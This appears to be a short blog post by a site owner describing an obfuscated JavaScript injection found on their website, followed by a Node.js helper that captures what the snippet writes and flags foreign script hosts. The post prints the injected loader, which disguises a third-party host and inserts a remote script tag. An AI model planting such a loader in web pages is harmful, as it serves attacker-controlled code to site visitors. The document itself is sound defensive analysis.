Just today I came across a JavaScript hack that was sending information for website users to a third-party location.
The way I found this out, other than getting malware notices from Google, was to do a Wireshark trace on the offending website. From there I saw some interesting requests. Upon closer inspection, I found a piece of code with this function that I did not recognize:
function advQuery(){
var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");
document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));
document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));
};advQuery();
It is easy enough to clear up, but now I need to find out how it got there!
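One way to see what such a snippet actually injects without loading it in a browser, as an added example that is not part of the original post: the code below runs under Node.js, records what the snippet passes to document.write, and lists the script hosts that are not the site's own. The helper names (captureWrites, scriptSources, foreignHosts) and the site host www.example.com are assumptions made for the illustration.

```javascript
// SAMPLE: the snippet from this post with its garbled quotes restored.
const SAMPLE = String.raw`function advQuery(){
var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");
document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));
document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));
};advQuery();`;

// Run the code with a stub `document` so writes are recorded, not rendered.
// new Function is not a sandbox: the code still runs in this process, so
// use a throwaway analysis machine for samples you have not read.
function captureWrites(code) {
  const written = [];
  const record = (...parts) => written.push(parts.join(""));
  const stubDocument = { write: record, writeln: record };
  const before = new Set(Object.keys(globalThis));
  try {
    new Function("document", code)(stubDocument);
  } finally {
    // The sample assigns undeclared variables (Track, get); remove them.
    for (const key of Object.keys(globalThis)) {
      if (!before.has(key)) delete globalThis[key];
    }
  }
  return written.join("");
}

// Pull every <script src=...> value out of the captured markup.
function scriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*(['"])(.*?)\1/gi;
  return [...html.matchAll(re)].map((m) => m[2]);
}

// Hostnames of script sources that are not the site's own host.
function foreignHosts(html, siteHost) {
  return scriptSources(html)
    .map((src) => new URL(src, `http://${siteHost}/`).hostname)
    .filter((host) => host !== siteHost);
}

const html = captureWrites(SAMPLE);
console.log(html);
console.log(foreignHosts(html, "www.example.com")); // assumed site host
```

The same foreignHosts check can be pointed at saved copies of a site's pages to flag any script tag whose host is not expected.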